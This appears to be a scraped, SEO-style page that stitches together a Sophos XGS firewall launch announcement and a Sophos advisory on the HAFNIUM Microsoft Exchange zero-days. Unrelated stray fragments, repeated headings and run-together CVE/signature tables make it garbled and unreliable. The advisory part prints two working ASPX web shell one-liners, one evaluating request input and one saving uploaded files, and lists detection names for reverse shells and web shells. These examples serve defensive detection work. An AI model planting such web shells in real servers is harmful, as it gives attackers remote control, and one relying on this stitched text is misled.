Sophos Antivirus Firewall



  1. Sophos Antivirus Firewall Rules
  2. Sophos Antivirus Firewall Review
  3. Sophos Antivirus Firewall Review

Today we’re announcing a brand-new range of hardware appliances for Sophos Firewall OS, the XGS Series. This is not just a technology refresh; our firewall appliances have been completely reengineered and now come with a dual processor architecture to deliver a significant performance increase over previous models.

The new XGS Series appliances release with Sophos Firewall OS v18.5, have a new simplified licensing scheme, and as if that wasn’t enough, we’re also changing the overall product name from Sophos XG Firewall to Sophos Firewall.

Indeed the Release Notes show Sophos Endpoint Firewall 1.0.0 since Endpoint Central 11.5.5 with the text The new endpoint firewall component supports the management of Windows Firewall. According to the What's new this is available since July. Sophos Firewall’s Xstream Protection Bundle provides all the next-gen protection, performance, and value you need to power the most demanding network. Base License Networking, wireless, Xstream Architecture, unlimited remote access VPN, site-to-site VPN, reporting. NOTE: The Sophos XG Free Home Use firewall contains its own operating system and will overwrite all data on the computer during the installation process. Therefore, a separate, dedicated computer is needed, which will change into a fully functional security appliance. Just right for the spare PC you have sitting in the corner! See how Sophos Endpoint, Sophos XG Firewall, and Sophos Encryption systematically work together to stop a ransomware attack. How to Get Synchronized Security To enable Synchronized Security, all you need is two or more Sophos products that work together. At least one product must be managed through the Sophos Central management platform.

Dual Processor Architecture

Every XGS Series appliance combines a multi-core x86 CPU with a dedicated Xstream Flow Processor for application acceleration. Xstream Flow Processors are Network Processing Units (NPUs) which now add a hardware layer FastPath to extend the Xstream architecture that we introduced in SFOS version 18.

Flexible to the core

One benefit of the hardware platform that we’ve chosen, is that our Xstream Flow Processors are programmable. This allows us to extend the offload capabilities in future software releases, providing additional performance improvements, even for things like crypto processes. This, combined with the ability to modify and extend connectivity on every appliance, delivers a truly future-proof solution which can adapt as the network, workforce and security infrastructure evolves.

Protection and Performance

The increase in performance varies by model and test but you’re likely to see at least a 2X performance increase over v18 running on XG Series hardware and numbers to meet or beat our key competitors on the all-important Price per Protected Mbps. The additional performance headroom allows customers to turn on essential protection, such as TLS Inspection, with the confidence that they’re removing a huge blind spot in their network visibility – which hackers are increasingly exploiting – whilst maintaining their network performance.

Sophos Firewall OS v18.5

The new appliances come with the latest v18.5 software release which not only provides support for the new hardware, but also includes all the 18.x maintenance releases since the v18 release with extensive security hardening features, VPN and SD-WAN enhancements, Central Management and Reporting capabilities, and many more improvements.

Sophos Antivirus Firewall

Note: 18.5 for all non-XGS Series customers is currently expected to be available in June.

Product naming and availability

The XGS Series model line-up is similar to what we offer with the XG Series:

  • Desktop model numbers have been increased by ‘1’
  • 1U and 2U rackmount model numbers have an added ‘0’

We’re launching all models over a period of about four to six weeks. All XGS Desktop and 1U 2xxx and 3xxx models are available from today, April 21st and the XGS 1U 4xxx and 2U models will be available from late May.

As actual availability can vary by model and region, please reach out to your local Sophos or distribution team for further details.

The XG Series models remain available for purchase.

Where to get more information

You can access all the updated resources for the Sophos Firewall and XGS Series launch, including a What’s New video, on the Partner Portal.

The web updates on sophos.com will be live in all core languages by 9am EDT/3pm CEST. The key pages for you to bookmark are sophos.com/firewall for the new main Sophos Firewall page and sophos.com/compare-xgs for the tech specs and details on the XGS Series.

Deezer black friday 2020 ad

A recording of the full launch SophSkills is available on the Partner Portal.

We wish you great success selling Sophos Firewall and the XGS Series and look forward to welcoming you to further webinars and events in the coming weeks.

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. Tempat aplikasi mac gratis. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVESID
CVE-2021-2685557241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVESID
CVE-2021-2685557241, 57242, 57243, 57244
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Sophos Antivirus Firewall Rules

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antvirus (SAV) 2021-03-11 14:30 UTC

Sophos Antivirus Firewall Review

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Sophos Antivirus Firewall Review

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC